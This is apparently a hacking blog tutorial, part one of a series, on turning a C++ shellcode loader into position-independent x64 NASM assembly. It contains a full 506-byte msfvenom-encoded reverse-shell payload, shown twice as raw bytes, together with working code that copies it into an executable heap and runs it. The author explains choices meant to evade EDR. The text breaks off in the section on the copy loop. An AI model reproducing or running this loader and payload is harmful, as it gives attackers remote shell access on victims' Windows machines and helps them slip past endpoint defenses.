
Have you ever wondered how PIC (position-independent code) actually works? I certainly have! You are exposed to PIC-based shellcode constantly in today’s widely used C2 platforms. Then there’s the popular donut utility, which can convert .NET assemblies to PIC-friendly shellcode. But what about writing it from scratch, and I mean producing a template in C++ and then writing x64 assembly code modeled after your C++ program? And why should we? Well, while I admit I can’t find many tutorials for writing PIC from scratch, I found a plethora of definitions and explanations of what PIC accomplishes. I don’t want to reinvent the wheel too much here, so here are the advantages of using PIC as I see them. I’ll also include the frustrations, in the opinion of yours truly. 😸

  • Necessity for ASLR Compatibility: Modern operating systems employ Address Space Layout Randomization (ASLR) to randomize memory addresses, making fixed-location shellcode unreliable or non-functional; PIC-friendly shellcode avoids absolute addresses, ensuring it executes correctly regardless of where it’s loaded in memory.
  • Enhanced Portability Across Environments: PIC shellcode doesn’t require relocation or patching at runtime, allowing it to run seamlessly in diverse scenarios like buffer overflows, heap sprays, or reflective DLL injection without load-address-specific tweaks, reducing development complexity.

Conversely, PIC is frustrating for these three reasons (and many more I’m sure! 😸):

  • Restricted Data Storage and Access: Unlike non-PIC code, PIC shellcode cannot rely on a static .data section for variables or constants due to potential relocation; developers must push values onto the runtime stack or use relative offsets (e.g., from RSP), increasing code size and complexity while risking stack overflows or alignment issues during execution.
  • Dynamic API Resolution Overhead: Direct imports from DLLs are impossible without base addresses, forcing runtime resolution techniques like walking the PEB/LDR structures or hashing API names, which adds significant instruction count (often 100+ bytes) and can fail in hardened environments with API set restrictions or obfuscation.
  • Limited Control Flow and Branching: Jumps and calls must use relative offsets (e.g., RIP-relative in x64), complicating conditional logic or loops that span large distances; this often leads to longer, less efficient code and errors in position-sensitive constructs like switch statements or error-prone disassembly during debugging.

The C++ Template

So, we’ve got our work cut out for us, eh? Well, I’m here to tell you it’s not so bad. Then again, I write assembly for fun. What’s that say about me? 😆 Let me go ahead and share our C++ template we will be building off of that will eventually execute fully via PIC friendly shellcode. It’s fairly simple in design, and I intentionally coded it that way so this won’t be too difficult a pill to swallow.

We start with our const uint8_t shellcode[]. I declare it with the const type qualifier, which makes the array read-only, so the shellcode is effectively immutable. This is wise in my opinion, as we don’t want EDR to immediately flag us just by glancing at our shellcode. In my experience, making your data read-only helps with routine checks by EDR more than you would expect, especially static analysis. From here on I’ll keep explaining through the inline comments in the code itself, so follow along there as I walk through the C++ code 😸

#include <windows.h>
#include <cstdint>
#include <cstdio>

int main() {
    // ---- 1. Shellcode (rev shell x64) msfvenom encoded ----
    const uint8_t shellcode[] = { 0x48, 0x8d, 0x35, 0x23, 0x00, 0x00, 0x00, 0x44, 0x8a, 0x0d, 0xb5, 0x01, 0x00, 0x00, 0xb9, 0xd0, 0x01, 0x00, 0x00, 0x8a, 0x06, 0x44, 0x30, 0xc8, 0xf6, 0xd0, 0x88, 0x06, 0x48, 0xff, 0xc6, 0xe2, 0xf2, 0x48, 0x8d, 0x05, 0x02, 0x00, 0x00, 0x00, 0xff, 0xe0, 0xaf, 0x1b, 0xd0, 0xb7, 0xa3, 0xbb, 0x93, 0x53, 0x53, 0x53, 0x12, 0x02, 0x12, 0x03, 0x01, 0x02, 0x05, 0x1b, 0x62, 0x81, 0x36, 0x1b, 0xd8, 0x01, 0x33, 0x1b, 0xd8, 0x01, 0x4b, 0x1b, 0xd8, 0x01, 0x73, 0x1b, 0xd8, 0x21, 0x03, 0x1b, 0x5c, 0xe4, 0x19, 0x19, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x6f, 0x32, 0x2f, 0x51, 0x7f, 0x73, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0xb1, 0xbe, 0x01, 0x12, 0x02, 0x1b, 0xd8, 0x01, 0x73, 0xd8, 0x11, 0x6f, 0x1b, 0x52, 0x83, 0xd8, 0xd3, 0xdb, 0x53, 0x53, 0x53, 0x1b, 0xd6, 0x93, 0x27, 0x34, 0x1b, 0x52, 0x83, 0x03, 0xd8, 0x1b, 0x4b, 0x17, 0xd8, 0x13, 0x73, 0x1a, 0x52, 0x83, 0xb0, 0x05, 0x1b, 0xac, 0x9a, 0x12, 0xd8, 0x67, 0xdb, 0x1b, 0x52, 0x85, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0x6b, 0xb3, 0x26, 0xa2, 0x1f, 0x50, 0x1f, 0x77, 0x5b, 0x16, 0x6a, 0x82, 0x26, 0x8b, 0x0b, 0x17, 0xd8, 0x13, 0x77, 0x1a, 0x52, 0x83, 0x35, 0x12, 0xd8, 0x5f, 0x1b, 0x17, 0xd8, 0x13, 0x4f, 0x1a, 0x52, 0x83, 0x12, 0xd8, 0x57, 0xdb, 0x1b, 0x52, 0x83, 0x12, 0x0b, 0x12, 0x0b, 0x0d, 0x0a, 0x09, 0x12, 0x0b, 0x12, 0x0a, 0x12, 0x09, 0x1b, 0xd0, 0xbf, 0x73, 0x12, 0x01, 0xac, 0xb3, 0x0b, 0x12, 0x0a, 0x09, 0x1b, 0xd8, 0x41, 0xba, 0x04, 0xac, 0xac, 0xac, 0x0e, 0x1a, 0xed, 0x24, 0x20, 0x61, 0x0c, 0x60, 0x61, 0x53, 0x53, 0x12, 0x05, 0x1a, 0xda, 0xb5, 0x1b, 0xd2, 0xbf, 0xf3, 0x52, 0x53, 0x53, 0x1a, 0xda, 0xb6, 0x1a, 0xef, 0x51, 0x53, 0x70, 0x7a, 0x2c, 0x53, 0x53, 0x52, 0x12, 0x07, 0x1a, 0xda, 0xb7, 0x1f, 0xda, 0xa2, 0x12, 0xe9, 0x1f, 0x24, 0x75, 0x54, 0xac, 0x86, 0x1f, 0xda, 0xb9, 0x3b, 0x52, 0x52, 0x53, 0x53, 0x0a, 0x12, 0xe9, 0x7a, 0xd3, 0x38, 0x53, 0xac, 0x86, 0x03, 0x03, 0x1e, 0x62, 0x9a, 0x1e, 0x62, 0x93, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x91, 
0x1b, 0xac, 0x93, 0x1b, 0xda, 0x92, 0x12, 0xe9, 0xb9, 0x5c, 0x8c, 0xb3, 0xac, 0x86, 0x1b, 0xda, 0x94, 0x39, 0x43, 0x12, 0x0b, 0x1f, 0xda, 0xb1, 0x1b, 0xda, 0xaa, 0x12, 0xe9, 0xca, 0xf6, 0x27, 0x32, 0xac, 0x86, 0x1b, 0xd2, 0x97, 0x13, 0x51, 0x53, 0x53, 0x1a, 0xeb, 0x30, 0x3e, 0x37, 0x53, 0x53, 0x53, 0x53, 0x53, 0x12, 0x03, 0x12, 0x03, 0x1b, 0xda, 0xb1, 0x04, 0x04, 0x04, 0x1e, 0x62, 0x93, 0x39, 0x5e, 0x0a, 0x12, 0x03, 0xb1, 0xaf, 0x35, 0x94, 0x17, 0x77, 0x07, 0x52, 0x52, 0x1b, 0xde, 0x17, 0x77, 0x4b, 0x95, 0x53, 0x3b, 0x1b, 0xda, 0xb5, 0x05, 0x03, 0x12, 0x03, 0x12, 0x03, 0x12, 0x03, 0x1a, 0xac, 0x93, 0x12, 0x03, 0x1a, 0xac, 0x9b, 0x1e, 0xda, 0x92, 0x1f, 0xda, 0x92, 0x12, 0xe9, 0x2a, 0x9f, 0x6c, 0xd5, 0xac, 0x86, 0x1b, 0x62, 0x81, 0x1b, 0xac, 0x99, 0xd8, 0x5d, 0x12, 0xe9, 0x5b, 0xd4, 0x4e, 0x33, 0xac, 0x86, 0xe8, 0xa3, 0xe6, 0xf1, 0x05, 0x12, 0xe9, 0xf5, 0xc6, 0xee, 0xce, 0xac, 0x86, 0x1b, 0xd0, 0x97, 0x7b, 0x6f, 0x55, 0x2f, 0x59, 0xd3, 0xa8, 0xb3, 0x26, 0x56, 0xe8, 0x14, 0x40, 0x21, 0x3c, 0x39, 0x53, 0x0a, 0x12, 0xda, 0x89, 0xac, 0x86, 0x53, 0x53, 0x53, 0x53 };


    SIZE_T const size = sizeof(shellcode); //this is simple enough, it just determines the size of our shellcode in bytes

    // Create executable heap (RWX by default)
    // as the comment above states, this is RWX by default.  I'm okay with that for the purposes of this exercise
    // I was originally going to use memory-mapped sections for this first blog post of our series, but heaps don't get the recognition they deserve
    // One drawback to using the heap is that it limits how much data you can toss at it.  Be mindful of that.  Though I'll admit I've never encountered a situation where I had shellcode large enough to fill it.
    HANDLE hHeap = HeapCreate(HEAP_CREATE_ENABLE_EXECUTE, 0, 0); 
    if (hHeap == NULL) {
        printf("HeapCreate failed: %lu\n", GetLastError()); // GetLastError returns a DWORD, so use %lu
        return 1;
    }

   // SIZE_T bufSize = shellcode size (506 bytes);
    LPVOID pBuffer = HeapAlloc(hHeap, HEAP_ZERO_MEMORY, size); //zero out the heap in preparation for our shellcode
    if (pBuffer == NULL) {
        printf("HeapAlloc failed: %lu\n", GetLastError());
        HeapDestroy(hHeap);
        return 1;
    }

    RtlMoveMemory(pBuffer, shellcode, size); //move our shellcode into the newly allocated heap

    // 4. Execute!
    ((void(*)())pBuffer)(); //execute it!

     // in case anyone was curious, the strange expression above means:

     // void(*)() = the type "pointer to a function that takes no arguments and returns nothing"
     // (void(*)())pBuffer = cast pBuffer, the location of our shellcode, to that function pointer type
     // the trailing () = call the function that pointer now refers to

    return 0;
}
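If the cast-and-call expression still looks odd, here is a minimal sketch of the same syntax with nothing but an ordinary function behind the pointer. The names say_hello, g_calls, EntryPoint and call_through_void_pointer are made up for this illustration and are not part of the template. Converting between void* and a function pointer is only conditionally supported by the C++ standard, although mainstream Windows and Linux compilers accept it.

```cpp
#include <cassert>

// Hypothetical stand-in for "whatever the pointer refers to": a normal function.
static int g_calls = 0;
static void say_hello() { ++g_calls; }

// Same shape as ((void(*)())pBuffer)(), spelled out one step at a time.
inline int call_through_void_pointer() {
    using EntryPoint = void (*)();                         // pointer to a function: no arguments, no return value
    void* raw = reinterpret_cast<void*>(&say_hello);       // plays the role of pBuffer
    EntryPoint entry = reinterpret_cast<EntryPoint>(raw);  // the cast
    entry();                                               // the trailing () performs the call
    return g_calls;                                        // how many times say_hello has run so far
}
```

Each call to call_through_void_pointer() runs say_hello exactly once through the cast pointer, which is all the one-liner in the template does with pBuffer.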

Go ahead and compile that, then set up your listener on localhost, port 9001. If you do all that, you’ll be greeted with a nice reverse shell:

image

Now, the fun begins! We need to start converting this to assembly, and then furthermore convert it all the way down to machine code / shellcode. That starts………..NOW!!! 😺

Converting to x64 Assembly

Go ahead and start debugging your code using Visual Studio. Go to Debug in the main menu toolbar, and select step over or press F10 on your keyboard for a nice shortcut. Keep going until you arrive at the HeapCreate API. Also, make sure your disassembly window is visible. Here’s what mine looks like:

image

Notice how we are setting up the parameters for our HeapCreate API before we call it. Under the Windows x64 calling convention, integer and pointer parameters always go in this specific order:

  • RCX
  • RDX
  • R8
  • R9
  • Uses the stack beyond the R9 register if the API requires more parameters passed to it.
  • Call API

So, what are we doing here exactly? Well, HeapCreate looks like the following:

image

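Notice how in the Visual Studio disassembly view, we’re moving 0x40000 (HEAP_CREATE_ENABLE_EXECUTE) into ECX as the 1st parameter. ECX is simply the lower 32 bits of RCX. The flOptions parameter is a DWORD (4 bytes), and on x64 any write to a 32-bit register zeroes the upper 32 bits of the full 64-bit register, so mov ecx, 0x40000 sets all of RCX while using a shorter encoding. That’s why Visual Studio chose ECX instead of RCX.

For the 2nd parameter passed into the API, Visual Studio chose EDX (instead of RDX) and sets it to 0 using XOR. Same thing for the 3rd parameter, using R8D (instead of R8), where the d stands for DWORD. Both of these parameters are SIZE_T values, which are 64 bits wide, but because a 32-bit write zero-extends, xor edx, edx and xor r8d, r8d clear the whole 64-bit register with fewer bytes than the 64-bit forms.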
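To make the zero-extension rule concrete, here is a small C++ model of it. This is only an illustration: Reg64, write32, write16 and the two helper functions are names invented for this sketch, and the code models the rule with plain integers instead of touching real registers.

```cpp
#include <cassert>
#include <cstdint>

// Toy model of one 64-bit general-purpose register.
struct Reg64 { std::uint64_t value; };

// Writing the 32-bit view (ECX, EDX, R8D, ...) clears bits 63..32.
inline void write32(Reg64& r, std::uint32_t v) { r.value = v; }

// Writing the 16-bit view (CX, DX, ...) leaves bits 63..16 untouched.
inline void write16(Reg64& r, std::uint16_t v) {
    r.value = (r.value & ~std::uint64_t{0xFFFF}) | v;
}

// Models "mov ecx, 0x40000" on a register that previously held all ones.
inline std::uint64_t after_mov_ecx() {
    Reg64 rcx{0xFFFFFFFFFFFFFFFFull};
    write32(rcx, 0x40000);
    return rcx.value;
}

// Models "mov cx, 0x1234" on the same starting value, for contrast.
inline std::uint64_t after_mov_cx() {
    Reg64 rcx{0xFFFFFFFFFFFFFFFFull};
    write16(rcx, 0x1234);
    return rcx.value;
}
```

In this model the 32-bit write leaves exactly 0x40000 in the register, while the 16-bit write keeps the stale upper bits. That difference is why the 32-bit forms are safe to use for parameter setup.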

Finally we call the API: call qword ptr [__imp_HeapCreate (07FF6281220F0h)]

Here’s what it looks like all together in NASM x64 syntax:

xor  r8d,r8d  
xor  edx,edx  
mov  ecx, 0x40000  
call HeapCreate

Next, you’ll see in the disassembly window the following instruction: mov qword ptr [hHeap],rax

We need to reproduce that in our own assembly code, but adjust it to conform to PIC requirements. We don’t have named variables like we do in C++ (we can’t store our HeapCreate handle in hHeap). So, I’ll show you how to store our HeapCreate HANDLE the PIC way 😸 I subtract 72 from the stack pointer, store the return value of HeapCreate at that location via mov [rsp], rax, and then move back to our original stack pointer location using add rsp, 72. The handle now lives at [rsp - 72]. One caveat: Windows x64 has no red zone, so anything below RSP can be overwritten by the next call we make. It works here because we read the handle back into RCX before calling HeapAlloc. If you need a value to survive across calls, keep it in a non-volatile register (RBX, R12 through R15, and so on) or in stack space you have actually reserved. With that caveat in mind, this is the method I learned for storing variables in a PIC-friendly manner, and it’s worked well for me over the years.

sub rsp, 72
mov [rsp], rax
add rsp, 72

With HeapCreate behind us, let’s keep going. Now, we’re going to look at HeapAlloc. Hit F10 a few more times to reach the API and then look at your disassembly window. Here’s mine:

image

and here’s the documentation for this API:

image

You’ll notice we have some interesting values being stored in the R8 and RCX registers. R8 receives the size of our shellcode, while RCX receives the handle returned by HeapCreate. EDX receives 8, which is the value of HEAP_ZERO_MEMORY. Remember when we subtracted 72 from our stack pointer and moved the RAX value into that location on the stack? That’s the HeapCreate handle value! Now we’re loading it into RCX.

Here’s what that looks like in NASM x64 assembly. Also, it’s worth mentioning that Visual Studio uses the MASM assembler syntax, whereas I show code in NASM. In NASM, you don’t need the PTR keyword, so you’ll see me omit it often when I reproduce the assembly code on the blog.

mov  r8, encoded_shellcode_total ;size of shellcode
mov  edx,8  
mov  rcx,qword [rsp - 72]  
call HeapAlloc

Now, you’re probably asking yourself, “Where did he get encoded_shellcode_total?” I’ll show you! That’s actually calculated at the very top of my assembly code. Check it out:

;nasm -fwin64 [x64findkernel32.asm]
;ld -m i386pep -N -o x64findkernel32.exe x64findkernel32.obj
; externs: ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib mem_heap_pic.obj -o mem_heap_pic.exe -lkernel32

BITS 64

section .shellstuff rdata read
encoded_shellcode:
db 0x48, 0x8d, 0x35, 0x23, 0x00, 0x00, 0x00, 0x44, 0x8a, 0x0d, 0xb5, 0x01, 0x00, 0x00, 0xb9, 0xd0, 0x01, 0x00, 0x00, 0x8a, 0x06, 0x44, 0x30, 0xc8, 0xf6, 0xd0, 0x88, 0x06, 0x48, 0xff, 0xc6, 0xe2, 0xf2, 0x48, 0x8d, 0x05, 0x02, 0x00, 0x00, 0x00, 0xff, 0xe0, 0xaf, 0x1b, 0xd0, 0xb7, 0xa3, 0xbb, 0x93, 0x53, 0x53, 0x53, 0x12, 0x02, 0x12, 0x03, 0x01, 0x02, 0x05, 0x1b, 0x62, 0x81, 0x36, 0x1b, 0xd8, 0x01, 0x33, 0x1b, 0xd8, 0x01, 0x4b, 0x1b, 0xd8, 0x01, 0x73, 0x1b, 0xd8, 0x21, 0x03, 0x1b, 0x5c, 0xe4, 0x19, 0x19, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x6f, 0x32, 0x2f, 0x51, 0x7f, 0x73, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0xb1, 0xbe, 0x01, 0x12, 0x02, 0x1b, 0xd8, 0x01, 0x73, 0xd8, 0x11, 0x6f, 0x1b, 0x52, 0x83, 0xd8, 0xd3, 0xdb, 0x53, 0x53, 0x53, 0x1b, 0xd6, 0x93, 0x27, 0x34, 0x1b, 0x52, 0x83, 0x03, 0xd8, 0x1b, 0x4b, 0x17, 0xd8, 0x13, 0x73, 0x1a, 0x52, 0x83, 0xb0, 0x05, 0x1b, 0xac, 0x9a, 0x12, 0xd8, 0x67, 0xdb, 0x1b, 0x52, 0x85, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0x6b, 0xb3, 0x26, 0xa2, 0x1f, 0x50, 0x1f, 0x77, 0x5b, 0x16, 0x6a, 0x82, 0x26, 0x8b, 0x0b, 0x17, 0xd8, 0x13, 0x77, 0x1a, 0x52, 0x83, 0x35, 0x12, 0xd8, 0x5f, 0x1b, 0x17, 0xd8, 0x13, 0x4f, 0x1a, 0x52, 0x83, 0x12, 0xd8, 0x57, 0xdb, 0x1b, 0x52, 0x83, 0x12, 0x0b, 0x12, 0x0b, 0x0d, 0x0a, 0x09, 0x12, 0x0b, 0x12, 0x0a, 0x12, 0x09, 0x1b, 0xd0, 0xbf, 0x73, 0x12, 0x01, 0xac, 0xb3, 0x0b, 0x12, 0x0a, 0x09, 0x1b, 0xd8, 0x41, 0xba, 0x04, 0xac, 0xac, 0xac, 0x0e, 0x1a, 0xed, 0x24, 0x20, 0x61, 0x0c, 0x60, 0x61, 0x53, 0x53, 0x12, 0x05, 0x1a, 0xda, 0xb5, 0x1b, 0xd2, 0xbf, 0xf3, 0x52, 0x53, 0x53, 0x1a,0xda, 0xb6, 0x1a, 0xef, 0x51, 0x53, 0x70, 0x7a, 0x2c, 0x53, 0x53, 0x52, 0x12, 0x07, 0x1a, 0xda, 0xb7, 0x1f, 0xda, 0xa2, 0x12, 0xe9, 0x1f, 0x24, 0x75, 0x54, 0xac, 0x86, 0x1f, 0xda, 0xb9, 0x3b, 0x52, 0x52, 0x53, 0x53, 0x0a, 0x12, 0xe9, 0x7a, 0xd3, 0x38, 0x53, 0xac, 0x86, 0x03, 0x03, 0x1e, 0x62, 0x9a, 0x1e, 0x62, 0x93, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x91, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x92, 
0x12, 0xe9, 0xb9, 0x5c, 0x8c, 0xb3, 0xac, 0x86, 0x1b, 0xda, 0x94, 0x39, 0x43, 0x12, 0x0b, 0x1f, 0xda, 0xb1, 0x1b, 0xda, 0xaa, 0x12, 0xe9, 0xca, 0xf6, 0x27, 0x32, 0xac, 0x86, 0x1b, 0xd2, 0x97, 0x13, 0x51, 0x53, 0x53, 0x1a, 0xeb, 0x30, 0x3e, 0x37, 0x53, 0x53, 0x53, 0x53, 0x53, 0x12, 0x03, 0x12, 0x03, 0x1b, 0xda, 0xb1, 0x04, 0x04,0x04, 0x1e, 0x62, 0x93, 0x39, 0x5e, 0x0a, 0x12, 0x03, 0xb1, 0xaf, 0x35, 0x94, 0x17, 0x77, 0x07, 0x52, 0x52, 0x1b, 0xde, 0x17, 0x77, 0x4b, 0x95, 0x53, 0x3b, 0x1b, 0xda, 0xb5, 0x05, 0x03, 0x12, 0x03, 0x12, 0x03, 0x12, 0x03, 0x1a, 0xac, 0x93, 0x12, 0x03, 0x1a, 0xac, 0x9b, 0x1e, 0xda, 0x92, 0x1f, 0xda, 0x92, 0x12, 0xe9, 0x2a, 0x9f, 0x6c, 0xd5, 0xac, 0x86, 0x1b, 0x62, 0x81, 0x1b, 0xac, 0x99, 0xd8, 0x5d, 0x12, 0xe9, 0x5b, 0xd4, 0x4e, 0x33, 0xac, 0x86, 0xe8, 0xa3, 0xe6, 0xf1, 0x05, 0x12, 0xe9, 0xf5, 0xc6, 0xee, 0xce, 0xac, 0x86, 0x1b, 0xd0, 0x97, 0x7b, 0x6f, 0x55, 0x2f, 0x59, 0xd3, 0xa8, 0xb3, 0x26, 0x56, 0xe8, 0x14, 0x40, 0x21, 0x3c, 0x39, 0x53, 0x0a, 0x12, 0xda, 0x89, 0xac, 0x86, 0x53, 0x53, 0x53, 0x53
encoded_shellcode_total equ $ - encoded_shellcode

section .data 

section .text
global main

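I basically introduce my own custom section called .shellstuff because I can 😸 I then place our reverse shell shellcode in it and make it read-only, just like the C++ code.

I calculate the total shellcode size using: encoded_shellcode_total equ $ - encoded_shellcode. This is PIC friendly, btw! equ defines an assemble-time constant, so the size ends up as an immediate value inside the instruction and not as an address that has to be looked up at runtime.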
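For readers more at home in C++, the closest counterpart to equ $ - label is sizeof on an array, which is also resolved at build time. The sketch below uses a few placeholder bytes of my own choosing (not the payload from this post), and the names placeholder, placeholder_total and total_size are invented for the illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Placeholder bytes, only here so there is something to measure.
constexpr std::uint8_t placeholder[] = { 0xde, 0xad, 0xbe, 0xef, 0x00 };

// Compile-time size: the C++ counterpart of "equ $ - label" in NASM.
constexpr std::size_t placeholder_total = sizeof(placeholder);

// Both checks are evaluated by the compiler, not at runtime.
static_assert(placeholder_total == 5, "five bytes are listed above");
static_assert(0x1FA == 506, "0x1FA is 506 in decimal");

// Small accessor so the constant can also be inspected at runtime.
inline std::size_t total_size() { return placeholder_total; }
```

The second static_assert is the same arithmetic as the 506-byte figure in the C++ template: 506 in decimal is 0x1FA in hex.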

Let’s revisit that API call for HeapAlloc. Now that you know how the total number of bytes in our shellcode is calculated, you can better understand the Visual Studio disassembly. If we manually calculated the total size, it would be 0x1FA (506 bytes), which is the value shown in the Visual Studio disassembler. Here’s our version of what we saw within Visual Studio for our original C++ code:

mov  r8, encoded_shellcode_total ;size of shellcode
mov  edx,8  
mov  rcx,qword [rsp - 72]  
call HeapAlloc

So, we call HeapAlloc, and now our heap has reserved enough bytes to hold our shellcode. Next up, I’ll introduce a custom assembly loop that copies our shellcode into the heap memory location we allocated. 😺

Before we do that, let me show you our PIC-friendly assembly so far, both the code and how it looks in x64dbg. Bear in mind we will eventually remove the externs. I’m just using them to simplify teaching you the basics of how we lay the foundation for PIC assembly code. In case you were wondering, externs are a way to call the Windows API of our choosing without walking the PEB and manually locating the API. We’ll get more into how to do this without relying on externs in Part 2. Ok, here’s our code so far:

; nasm -fwin64 [x64findkernel32.asm]
; ld -m i386pep -N -o x64findkernel32.exe x64findkernel32.obj
; externs: ld -m i386pep -LC:\mingw64\x86_64-w64-mingw32\lib asmsock.obj -o asmsock.exe -lws2_32 -lkernel32

BITS 64

section .shellstuff rdata read
encoded_shellcode:
db 0x48, 0x8d, 0x35, 0x23, 0x00, 0x00, 0x00, 0x44, 0x8a, 0x0d, 0xb5, 0x01, 0x00, 0x00, 0xb9, 0xd0, 0x01, 0x00, 0x00, 0x8a, 0x06, 0x44, 0x30, 0xc8, 0xf6, 0xd0, 0x88, 0x06, 0x48, 0xff, 0xc6, 0xe2, 0xf2, 0x48, 0x8d, 0x05, 0x02, 0x00, 0x00, 0x00, 0xff, 0xe0, 0xaf, 0x1b, 0xd0, 0xb7, 0xa3, 0xbb, 0x93, 0x53, 0x53, 0x53, 0x12, 0x02, 0x12, 0x03, 0x01, 0x02, 0x05, 0x1b, 0x62, 0x81, 0x36, 0x1b, 0xd8, 0x01, 0x33, 0x1b, 0xd8, 0x01, 0x4b, 0x1b, 0xd8, 0x01, 0x73, 0x1b, 0xd8, 0x21, 0x03, 0x1b, 0x5c, 0xe4, 0x19, 0x19, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x6f, 0x32, 0x2f, 0x51, 0x7f, 0x73, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0xb1, 0xbe, 0x01, 0x12, 0x02, 0x1b, 0xd8, 0x01, 0x73, 0xd8, 0x11, 0x6f, 0x1b, 0x52, 0x83, 0xd8, 0xd3, 0xdb, 0x53, 0x53, 0x53, 0x1b, 0xd6, 0x93, 0x27, 0x34, 0x1b, 0x52, 0x83, 0x03, 0xd8, 0x1b, 0x4b, 0x17, 0xd8, 0x13, 0x73, 0x1a, 0x52, 0x83, 0xb0, 0x05, 0x1b, 0xac, 0x9a, 0x12, 0xd8, 0x67, 0xdb, 0x1b, 0x52, 0x85, 0x1e, 0x62, 0x9a, 0x1b, 0x62, 0x93, 0xff, 0x12, 0x92, 0x9a, 0x5e, 0x12, 0x52, 0x92, 0x6b, 0xb3, 0x26, 0xa2, 0x1f, 0x50, 0x1f, 0x77, 0x5b, 0x16, 0x6a, 0x82, 0x26, 0x8b, 0x0b, 0x17, 0xd8, 0x13, 0x77, 0x1a, 0x52, 0x83, 0x35, 0x12, 0xd8, 0x5f, 0x1b, 0x17, 0xd8, 0x13, 0x4f, 0x1a, 0x52, 0x83, 0x12, 0xd8, 0x57, 0xdb, 0x1b, 0x52, 0x83, 0x12, 0x0b, 0x12, 0x0b, 0x0d, 0x0a, 0x09, 0x12, 0x0b, 0x12, 0x0a, 0x12, 0x09, 0x1b, 0xd0, 0xbf, 0x73, 0x12, 0x01, 0xac, 0xb3, 0x0b, 0x12, 0x0a, 0x09, 0x1b, 0xd8, 0x41, 0xba, 0x04, 0xac, 0xac, 0xac, 0x0e, 0x1a, 0xed, 0x24, 0x20, 0x61, 0x0c, 0x60, 0x61, 0x53, 0x53, 0x12, 0x05, 0x1a, 0xda, 0xb5, 0x1b, 0xd2, 0xbf, 0xf3, 0x52, 0x53, 0x53, 0x1a,0xda, 0xb6, 0x1a, 0xef, 0x51, 0x53, 0x70, 0x7a, 0x2c, 0x53, 0x53, 0x52, 0x12, 0x07, 0x1a, 0xda, 0xb7, 0x1f, 0xda, 0xa2, 0x12, 0xe9, 0x1f, 0x24, 0x75, 0x54, 0xac, 0x86, 0x1f, 0xda, 0xb9, 0x3b, 0x52, 0x52, 0x53, 0x53, 0x0a, 0x12, 0xe9, 0x7a, 0xd3, 0x38, 0x53, 0xac, 0x86, 0x03, 0x03, 0x1e, 0x62, 0x9a, 0x1e, 0x62, 0x93, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x91, 0x1b, 0xac, 0x93, 0x1b, 0xda, 0x92, 
0x12, 0xe9, 0xb9, 0x5c, 0x8c, 0xb3, 0xac, 0x86, 0x1b, 0xda, 0x94, 0x39, 0x43, 0x12, 0x0b, 0x1f, 0xda, 0xb1, 0x1b, 0xda, 0xaa, 0x12, 0xe9, 0xca, 0xf6, 0x27, 0x32, 0xac, 0x86, 0x1b, 0xd2, 0x97, 0x13, 0x51, 0x53, 0x53, 0x1a, 0xeb, 0x30, 0x3e, 0x37, 0x53, 0x53, 0x53, 0x53, 0x53, 0x12, 0x03, 0x12, 0x03, 0x1b, 0xda, 0xb1, 0x04, 0x04,0x04, 0x1e, 0x62, 0x93, 0x39, 0x5e, 0x0a, 0x12, 0x03, 0xb1, 0xaf, 0x35, 0x94, 0x17, 0x77, 0x07, 0x52, 0x52, 0x1b, 0xde, 0x17, 0x77, 0x4b, 0x95, 0x53, 0x3b, 0x1b, 0xda, 0xb5, 0x05, 0x03, 0x12, 0x03, 0x12, 0x03, 0x12, 0x03, 0x1a, 0xac, 0x93, 0x12, 0x03, 0x1a, 0xac, 0x9b, 0x1e, 0xda, 0x92, 0x1f, 0xda, 0x92, 0x12, 0xe9, 0x2a, 0x9f, 0x6c, 0xd5, 0xac, 0x86, 0x1b, 0x62, 0x81, 0x1b, 0xac, 0x99, 0xd8, 0x5d, 0x12, 0xe9, 0x5b, 0xd4, 0x4e, 0x33, 0xac, 0x86, 0xe8, 0xa3, 0xe6, 0xf1, 0x05, 0x12, 0xe9, 0xf5, 0xc6, 0xee, 0xce, 0xac, 0x86, 0x1b, 0xd0, 0x97, 0x7b, 0x6f, 0x55, 0x2f, 0x59, 0xd3, 0xa8, 0xb3, 0x26, 0x56, 0xe8, 0x14, 0x40, 0x21, 0x3c, 0x39, 0x53, 0x0a, 0x12, 0xda, 0x89, 0xac, 0x86, 0x53, 0x53, 0x53, 0x53
encoded_shellcode_total equ $ - encoded_shellcode

section .data 

section .text
global main

; both of these are conveniently in kernel32.dll ;)
extern HeapCreate
extern HeapAlloc

main:
sub rsp, 0x28
and rsp, 0xFFFFFFFFFFFFFFF0 ; this instruction helps with stack alignment
	
xor  r8d,r8d  
xor  edx,edx  
mov  ecx, 0x40000  
call HeapCreate
sub rsp, 72
mov [rsp], rax
add rsp, 72
xor rcx, rcx
	
mov  r8, encoded_shellcode_total ;size of shellcode
mov  edx,8  
mov  rcx,qword [rsp - 72]  
call HeapAlloc
push rax
pop rdx ; memory address of our heap allocation

Here’s how everything looks in x64dbg:

image

And take a look at our registers RAX and RDX. They are both holding the return value of HeapAlloc. RAX always holds the return value and I popped it into RDX for future use.

image

If you follow that memory location in the dump, you’ll see it’s filled with zeros. This location will soon be populated with our shellcode!

image

Copying our shellcode into the Heap

Hopefully everything has made sense up to this point…and really…hopefully everything keeps making sense! 😆 For this next portion of our PIC assembly and soon-to-be shellcode template, I could have used memcpy or the RtlMoveMemory API. However, that’s yet another API we’d have to track down, and it would increase the size of our final shellcode, which we want to keep small whenever we can. In this case we can, so let’s roll with it. I’m going to set up a loop that copies our reverse shell shellcode byte by byte into the heap address we allocated. Here’s what that looks like:


  ;=======================================================================
  ; included the below for context to see how I got RDX and why we need it
  call        HeapAlloc
	push rax
	pop rdx ; memory address of our heap allocation
  ;=======================================================================

